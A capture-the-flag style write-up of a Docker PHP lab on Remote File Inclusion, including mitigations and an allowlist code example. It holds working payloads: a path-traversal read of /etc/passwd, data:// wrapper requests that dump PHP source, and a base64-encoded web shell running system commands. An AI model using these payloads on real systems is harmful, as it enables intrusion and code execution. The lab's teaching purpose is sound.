Remote File Inclusion (RFI) Lab — Docker Custom Setup and Exploitation

Jun 3, 2025

🧨 Vulnerability:

  • Remote File Inclusion (RFI) via unsanitized file parameter.

⚠️ Risk Assessment:

  • Risk Level: Critical
  • Impact: Remote code execution, data exposure
  • Likelihood: High

🛠️ Lab Setup: RFI Vulnerability with Docker

Prerequisites:

Ensure Docker is installed on your Kali machine:

sudo apt install docker.io

Clone the Lab Repository:

git clone https://github.com/moeinfatehi/rfi_vulnerability_scenarios.git
cd rfi_vulnerability_scenarios
sudo docker-compose up --build

Once the build is complete, access the lab via the local Docker IP (e.g., http://172.18.0.2).

✅ To stop Docker:

sudo docker stop $(sudo docker ps -a -q)

🔍 Approaches to Solve the RFI Labs

The lab includes two vulnerable pages:

  • rfi1
  • rfi2

This write-up focuses on rfi1.

🌐 RFI1 Analysis

The page at http://172.18.0.2/rfi1/ presents a form with two buttons:

  • Submit
  • Include File (uses ?file=flag.php)

The source code hints that a flag exists inside flag.php, but accessing it directly is restricted.

🧪 Attempted LFI (Local File Inclusion)

Tried a classic LFI payload:

http://172.18.0.2/rfi1/?file=../../../../../../etc/passwd

🚫 Output:

“Forget LFI, try RFI!”

This suggests Remote File Inclusion is intended.

🌐 Remote File Inclusion Attempt

Tried loading an external resource:

http://172.18.0.2/rfi1/?file=https://google.com

✅ Google loaded, confirming RFI is functional.

💡 Using PHP Wrappers (data://)

To exploit RFI without external hosting, I used PHP’s data:// wrapper to inject base64-encoded payloads directly.

Payloads Used:

# Base64 encode and read local PHP file (e.g., index.php)
http://172.18.0.2/rfi1/?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
# Execute system command via GET parameter (basic web shell)
http://172.18.0.2/rfi1/?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

Decoded Result: Flag was printed in base64 format.
🧠 Decoded the flag using:

echo 'BASE64_STRING' | base64 -d

🎉 Flag successfully retrieved! The request that read flag.php:

http://target/rfi1/?file=data://text/plain,<?php echo base64_encode(file_get_contents("flag.php")); ?>

🛡️ Recommended Mitigations:

  • Disable allow_url_include and allow_url_fopen in php.ini
  • Sanitize and validate all user inputs
  • Implement strict allowlists for file inclusion
  • Use secure coding patterns for dynamic file loading
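The allowlist mitigation above, sketched as an added example that is not the lab's own code: the request supplies a key that is looked up in a fixed map, so the parameter never reaches include as a path or URL. It assumes PHP 8; the page keys, file names and the resolve_page helper are hypothetical, and the inputs are constructed from the values tried in this write-up.

```php
<?php
declare(strict_types=1);
// Added example, not the lab's code. Page keys and file names are assumptions.
// Vulnerable pattern (for contrast): include $_GET['file'];
// With allow_url_include=On, include resolves http://, https:// and data://
// wrappers, so the parameter value itself is fetched and executed as PHP.

const PAGES = ['home' => 'home.php', 'about' => 'about.php']; // hypothetical

// Map a request key to a file under $baseDir; null means "reject".
function resolve_page(mixed $key, string $baseDir): ?string
{
    // The request chooses a key, never a path or URL. Arrays (?file[]=x),
    // wrappers, ../ sequences and absolute paths all fail this lookup.
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Defence in depth: the resolved file must exist inside the base dir,
    // which also catches a symlink planted under it.
    $path = realpath($base . DIRECTORY_SEPARATOR . PAGES[$key]);
    if ($path === false || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// Self-check on constructed inputs (run with: php allowlist.php).
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', '<p>home</p>');

$inputs = [
    'home',                                   // allowed key
    'about',                                  // allowed key, file missing
    'flag.php',                               // file name, not a key
    '../../../../../../etc/passwd',           // traversal from the write-up
    'https://google.com',                     // remote URL from the write-up
    'data://text/plain;base64,QQ==',          // constructed data: wrapper value
];
foreach ($inputs as $in) {
    $p = resolve_page($in, $dir);
    printf("%-32s => %s\n", $in, $p === null ? 'rejected' : 'include ' . basename($p));
}
unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($dir);
```

Only the first input resolves to a file; every other value, including the missing about page, is rejected before any include call would run.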

✅ Conclusion

This lab demonstrated a practical scenario of Remote File Inclusion (RFI) using PHP’s data:// wrapper to access local resources and execute arbitrary code. It highlighted:

  • Secure lab setup via Docker
  • Identification and exploitation of RFI
  • Use of base64 encoding for stealth payload delivery.

If you have any questions, leave a comment. Thank you.

Written by Shahin Raza
